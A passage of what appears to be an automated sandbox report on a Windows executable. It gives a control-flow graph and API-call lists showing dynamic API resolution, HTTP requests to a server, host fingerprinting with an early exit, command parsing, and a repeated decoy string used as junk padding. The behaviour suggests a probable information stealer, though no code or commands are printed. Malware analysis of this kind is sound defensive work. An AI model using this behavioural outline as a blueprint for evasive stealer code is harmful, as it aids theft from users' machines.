27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403c94 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403cad 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403cc6 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403cdf 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403cf8 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403d11 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403d2a 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403d43 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403d5c 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403d75 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403d8e 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403da7 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403dc0 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403dd9 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403df2 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403e0b 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403e24 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403e3d 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403e56 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403e6f 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403e88 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403ea1 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403eba 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403ed3 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403eec 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403f05 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403f1e 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403f37 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403f50 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403f69 27137->27138 27139 4045c0 34 API calls 
27138->27139 27140 403f82 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 403f9b 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 403fb4 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 403fcd 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 403fe6 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 403fff 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 404018 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 404031 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 40404a 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 404063 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 40407c 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 404095 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 4040ae 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 4040c7 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 4040e0 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 4040f9 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404112 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 40412b 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 404144 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 40415d 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 404176 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 40418f 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4041a8 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 4041c1 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 4041da 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 4041f3 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 40420c 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 404225 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 40423e 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 404257 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 404270 27199->27200 27201 
4045c0 34 API calls 27200->27201 27202 404289 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 4042a2 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 4042bb 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 4042d4 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 4042ed 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 404306 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 40431f 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 404338 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 404351 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 40436a 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 404383 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 40439c 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 4043b5 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 4043ce 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 4043e7 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 404400 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 404419 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 404432 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 40444b 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 404464 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 40447d 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 404496 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 4044af 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 4044c8 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 4044e1 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 4044fa 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 404513 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 40452c 27255->27256 27257 4045c0 34 API calls 27256->27257 27258 404545 27257->27258 27259 4045c0 34 API calls 27258->27259 27260 40455e 27259->27260 27261 4045c0 34 API calls 27260->27261 27262 404577 
27261->27262 27263 4045c0 34 API calls 27262->27263 27264 404590 27263->27264 27265 4045c0 34 API calls 27264->27265 27266 4045a9 27265->27266 27267 419c10 27266->27267 27268 419c20 43 API calls 27267->27268 27269 41a036 8 API calls 27267->27269 27268->27269 27270 41a146 27269->27270 27271 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27269->27271 27272 41a153 8 API calls 27270->27272 27273 41a216 27270->27273 27271->27270 27272->27273 27274 41a298 27273->27274 27275 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27273->27275 27276 41a2a5 6 API calls 27274->27276 27277 41a337 27274->27277 27275->27274 27276->27277 27278 41a344 9 API calls 27277->27278 27279 41a41f 27277->27279 27278->27279 27280 41a4a2 27279->27280 27281 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27279->27281 27282 41a4ab GetProcAddress GetProcAddress 27280->27282 27283 41a4dc 27280->27283 27281->27280 27282->27283 27284 41a515 27283->27284 27285 41a4e5 GetProcAddress GetProcAddress 27283->27285 27286 41a612 27284->27286 27287 41a522 10 API calls 27284->27287 27285->27284 27288 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27286->27288 27289 41a67d 27286->27289 27287->27286 27288->27289 27290 41a686 GetProcAddress 27289->27290 27291 41a69e 27289->27291 27290->27291 27292 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27291->27292 27293 415ca3 27291->27293 27292->27293 27294 401590 27293->27294 27569 401670 27294->27569 27297 41a7a0 lstrcpy 27298 4015b5 27297->27298 27299 41a7a0 lstrcpy 27298->27299 27300 4015c7 27299->27300 27301 41a7a0 lstrcpy 27300->27301 27302 4015d9 27301->27302 27303 41a7a0 lstrcpy 27302->27303 27304 401663 27303->27304 27305 415510 27304->27305 27306 415521 27305->27306 27307 41a820 2 API calls 27306->27307 27308 41552e 27307->27308 27309 41a820 2 API calls 27308->27309 27310 41553b 27309->27310 27311 41a820 2 API calls 
27310->27311 27312 415548 27311->27312 27313 41a740 lstrcpy 27312->27313 27314 415555 27313->27314 27315 41a740 lstrcpy 27314->27315 27316 415562 27315->27316 27317 41a740 lstrcpy 27316->27317 27318 41556f 27317->27318 27319 41a740 lstrcpy 27318->27319 27330 41557c 27319->27330 27320 41a740 lstrcpy 27320->27330 27321 415643 StrCmpCA 27321->27330 27322 4156a0 StrCmpCA 27323 4157dc 27322->27323 27322->27330 27324 41a8a0 lstrcpy 27323->27324 27326 4157e8 27324->27326 27325 401590 lstrcpy 27325->27330 27327 41a820 2 API calls 27326->27327 27328 4157f6 27327->27328 27332 41a820 2 API calls 27328->27332 27329 415856 StrCmpCA 27329->27330 27333 415991 27329->27333 27330->27320 27330->27321 27330->27322 27330->27325 27330->27329 27331 41a7a0 lstrcpy 27330->27331 27338 41a820 lstrlenA lstrcpy 27330->27338 27341 415a0b StrCmpCA 27330->27341 27346 41a8a0 lstrcpy 27330->27346 27352 4152c0 29 API calls 27330->27352 27355 41578a StrCmpCA 27330->27355 27358 41593f StrCmpCA 27330->27358 27359 4151f0 23 API calls 27330->27359 27331->27330 27335 415805 27332->27335 27334 41a8a0 lstrcpy 27333->27334 27336 41599d 27334->27336 27337 401670 lstrcpy 27335->27337 27339 41a820 2 API calls 27336->27339 27357 415811 27337->27357 27338->27330 27340 4159ab 27339->27340 27342 41a820 2 API calls 27340->27342 27343 415a16 Sleep 27341->27343 27344 415a28 27341->27344 27347 4159ba 27342->27347 27343->27330 27345 41a8a0 lstrcpy 27344->27345 27348 415a34 27345->27348 27346->27330 27349 401670 lstrcpy 27347->27349 27350 41a820 2 API calls 27348->27350 27349->27357 27351 415a43 27350->27351 27353 41a820 2 API calls 27351->27353 27352->27330 27354 415a52 27353->27354 27356 401670 lstrcpy 27354->27356 27355->27330 27356->27357 27357->26413 27358->27330 27359->27330 27361 417553 GetVolumeInformationA 27360->27361 27362 41754c 27360->27362 27368 417591 27361->27368 27362->27361 27363 4175fc GetProcessHeap HeapAlloc 27364 417619 27363->27364 27365 417628 wsprintfA 27363->27365 27366 41a740 lstrcpy 
27364->27366 27367 41a740 lstrcpy 27365->27367 27369 415da7 27366->27369 27367->27369 27368->27363 27369->26434 27371 41a7a0 lstrcpy 27370->27371 27372 404899 27371->27372 27578 4047b0 27372->27578 27374 4048a5 27375 41a740 lstrcpy 27374->27375 27376 4048d7 27375->27376 27377 41a740 lstrcpy 27376->27377 27378 4048e4 27377->27378 27379 41a740 lstrcpy 27378->27379 27380 4048f1 27379->27380 27381 41a740 lstrcpy 27380->27381 27382 4048fe 27381->27382 27383 41a740 lstrcpy 27382->27383 27384 40490b InternetOpenA StrCmpCA 27383->27384 27385 404944 27384->27385 27386 404955 27385->27386 27387 404ecb InternetCloseHandle 27385->27387 27591 418b60 GetSystemTime lstrcpy lstrcpy 27386->27591 27389 404ee8 27387->27389 27586 409ac0 CryptStringToBinaryA 27389->27586 27390 404963 27592 41a920 lstrcpy lstrcpy lstrcatA 27390->27592 27393 404976 27395 41a8a0 lstrcpy 27393->27395 27400 40497f 27395->27400 27396 41a820 2 API calls 27397 404f05 27396->27397 27399 41a9b0 4 API calls 27397->27399 27398 404f27 codecvt 27402 41a7a0 lstrcpy 27398->27402 27401 404f1b 27399->27401 27404 41a9b0 4 API calls 27400->27404 27403 41a8a0 lstrcpy 27401->27403 27408 404f57 27402->27408 27403->27398 27405 4049a9 27404->27405 27406 41a8a0 lstrcpy 27405->27406 27407 4049b2 27406->27407 27409 41a9b0 4 API calls 27407->27409 27408->26437 27410 4049d1 27409->27410 27411 41a8a0 lstrcpy 27410->27411 27412 4049da 27411->27412 27593 41a920 lstrcpy lstrcpy lstrcatA 27412->27593 27414 4049f8 27415 41a8a0 lstrcpy 27414->27415 27416 404a01 27415->27416 27417 41a9b0 4 API calls 27416->27417 27418 404a20 27417->27418 27419 41a8a0 lstrcpy 27418->27419 27420 404a29 27419->27420 27421 41a9b0 4 API calls 27420->27421 27422 404a48 27421->27422 27423 41a8a0 lstrcpy 27422->27423 27424 404a51 27423->27424 27425 41a9b0 4 API calls 27424->27425 27426 404a7d 27425->27426 27594 41a920 lstrcpy lstrcpy lstrcatA 27426->27594 27428 404a84 27429 41a8a0 lstrcpy 27428->27429 27430 404a8d 27429->27430 27431 404aa3 InternetConnectA 
27430->27431 27431->27387 27432 404ad3 HttpOpenRequestA 27431->27432 27434 404b28 27432->27434 27435 404ebe InternetCloseHandle 27432->27435 27436 41a9b0 4 API calls 27434->27436 27435->27387 27437 404b3c 27436->27437 27438 41a8a0 lstrcpy 27437->27438 27439 404b45 27438->27439 27595 41a920 lstrcpy lstrcpy lstrcatA 27439->27595 27441 404b63 27442 41a8a0 lstrcpy 27441->27442 27443 404b6c 27442->27443 27444 41a9b0 4 API calls 27443->27444 27445 404b8b 27444->27445 27446 41a8a0 lstrcpy 27445->27446 27447 404b94 27446->27447 27448 41a9b0 4 API calls 27447->27448 27449 404bb5 27448->27449 27450 41a8a0 lstrcpy 27449->27450 27451 404bbe 27450->27451 27452 41a9b0 4 API calls 27451->27452 27453 404bde 27452->27453 27454 41a8a0 lstrcpy 27453->27454 27455 404be7 27454->27455 27456 41a9b0 4 API calls 27455->27456 27457 404c06 27456->27457 27458 41a8a0 lstrcpy 27457->27458 27459 404c0f 27458->27459 27596 41a920 lstrcpy lstrcpy lstrcatA 27459->27596 27461 404c2d 27462 41a8a0 lstrcpy 27461->27462 27463 404c36 27462->27463 27464 41a9b0 4 API calls 27463->27464 27465 404c55 27464->27465 27466 41a8a0 lstrcpy 27465->27466 27467 404c5e 27466->27467 27468 41a9b0 4 API calls 27467->27468 27469 404c7d 27468->27469 27470 41a8a0 lstrcpy 27469->27470 27471 404c86 27470->27471 27597 41a920 lstrcpy lstrcpy lstrcatA 27471->27597 27473 404ca4 27474 41a8a0 lstrcpy 27473->27474 27475 404cad 27474->27475 27476 41a9b0 4 API calls 27475->27476 27477 404ccc 27476->27477 27478 41a8a0 lstrcpy 27477->27478 27479 404cd5 27478->27479 27480 41a9b0 4 API calls 27479->27480 27481 404cf6 27480->27481 27482 41a8a0 lstrcpy 27481->27482 27483 404cff 27482->27483 27484 41a9b0 4 API calls 27483->27484 27485 404d1f 27484->27485 27486 41a8a0 lstrcpy 27485->27486 27487 404d28 27486->27487 27488 41a9b0 4 API calls 27487->27488 27489 404d47 27488->27489 27490 41a8a0 lstrcpy 27489->27490 27491 404d50 27490->27491 27598 41a920 lstrcpy lstrcpy lstrcatA 27491->27598 27493 404d6e 27494 41a8a0 lstrcpy 27493->27494 27495 
404d77 27494->27495 27496 41a740 lstrcpy 27495->27496 27497 404d92 27496->27497 27599 41a920 lstrcpy lstrcpy lstrcatA 27497->27599 27499 404db3 27600 41a920 lstrcpy lstrcpy lstrcatA 27499->27600 27501 404dba 27502 41a8a0 lstrcpy 27501->27502 27503 404dc6 27502->27503 27504 404de7 lstrlenA 27503->27504 27505 404dfa 27504->27505 27506 404e03 lstrlenA 27505->27506 27601 41aad0 27506->27601 27508 404e13 HttpSendRequestA 27509 404e32 InternetReadFile 27508->27509 27510 404e67 InternetCloseHandle 27509->27510 27515 404e5e 27509->27515 27512 41a800 27510->27512 27512->27435 27513 41a9b0 4 API calls 27513->27515 27514 41a8a0 lstrcpy 27514->27515 27515->27509 27515->27510 27515->27513 27515->27514 27606 41aad0 27516->27606 27518 4117c4 StrCmpCA 27519 4117d7 27518->27519 27520 4117cf ExitProcess 27518->27520 27521 4117e7 strtok_s 27519->27521 27524 4117f4 27521->27524 27522 4119c2 27522->26439 27523 41199e strtok_s 27523->27524 27524->27522 27524->27523 27525 4118ad StrCmpCA 27524->27525 27526 4118cf StrCmpCA 27524->27526 27527 4118f1 StrCmpCA 27524->27527 27528 411951 StrCmpCA 27524->27528 27529 411970 StrCmpCA 27524->27529 27530 411913 StrCmpCA 27524->27530 27531 411932 StrCmpCA 27524->27531 27532 41185d StrCmpCA 27524->27532 27533 41187f StrCmpCA 27524->27533 27534 41a820 lstrlenA lstrcpy 27524->27534 27535 41a820 2 API calls 27524->27535 27525->27524 27526->27524 27527->27524 27528->27524 27529->27524 27530->27524 27531->27524 27532->27524 27533->27524 27534->27524 27535->27523 27536->26445 27537->26447 27538->26453 27539->26455 27540->26461 27541->26463 27542->26467 27543->26471 27544->26475 27545->26481 27546->26483 27547->26487 27548->26501 27549->26505 27550->26504 27551->26500 27552->26504 27553->26519 27554->26508 27555->26510 27556->26513 27557->26516 27558->26521 27559->26528 27560->26531 27561->26537 27562->26558 27563->26561 27564->26562 27565->26557 27566->26562 27567->26571 27570 41a7a0 lstrcpy 27569->27570 27571 401683 27570->27571 27572 41a7a0 lstrcpy 
27571->27572 27573 401695 27572->27573 27574 41a7a0 lstrcpy 27573->27574 27575 4016a7 27574->27575 27576 41a7a0 lstrcpy 27575->27576 27577 4015a3 27576->27577 27577->27297 27602 401030 27578->27602 27582 404838 lstrlenA 27605 41aad0 27582->27605 27584 404848 InternetCrackUrlA 27585 404867 27584->27585 27585->27374 27587 409af9 LocalAlloc 27586->27587 27588 404eee 27586->27588 27587->27588 27589 409b14 CryptStringToBinaryA 27587->27589 27588->27396 27588->27398 27589->27588 27590 409b39 LocalFree 27589->27590 27590->27588 27591->27390 27592->27393 27593->27414 27594->27428 27595->27441 27596->27461 27597->27473 27598->27493 27599->27499 27600->27501 27601->27508 27603 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27602->27603 27604 41aad0 27603->27604 27604->27582 27605->27584 27606->27518 27724 416ab1 902 API calls 27698 4069f3 7 API calls 27760 7f13c7 strtok_s strtok_s 27729 41cafe 219 API calls 4 library calls 27731 7e6ebc VirtualProtect 27666 7f04b7 88 API calls 27667 7f0cb6 30 API calls 26178 401190 26185 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26178->26185 26180 40119e 26181 4011cc 26180->26181 26187 417850 GetProcessHeap HeapAlloc GetUserNameA 26180->26187 26183 4011b7 26183->26181 26184 4011c4 ExitProcess 26183->26184 26186 417939 26185->26186 26186->26180 26188 4178c3 26187->26188 26188->26183 27668 7fd0af RtlLeaveCriticalSection __initptd 27734 7f32ae 22 API calls 27669 7f140b StrCmpCA strtok_s 27735 41ce9f 69 API calls __amsg_exit 27701 7fcd90 173 API calls 3 library calls 27671 4088a4 RaiseException task __CxxThrowException@8 27672 4180a5 GetProcessHeap HeapFree 27737 7f0297 131 API calls 27739 7fae93 43 API calls ctype 27702 7fcd8f 6 API calls 2 library calls 27673 7f102b StrCmpCA strtok_s lstrlen lstrcpy 27703 41b9b0 RtlUnwind 27704 7f118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27675 7f3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s

                                    Control-flow Graph

                                    APIs
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                    • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                    • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                    • strlen.MSVCRT ref: 004046F0
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
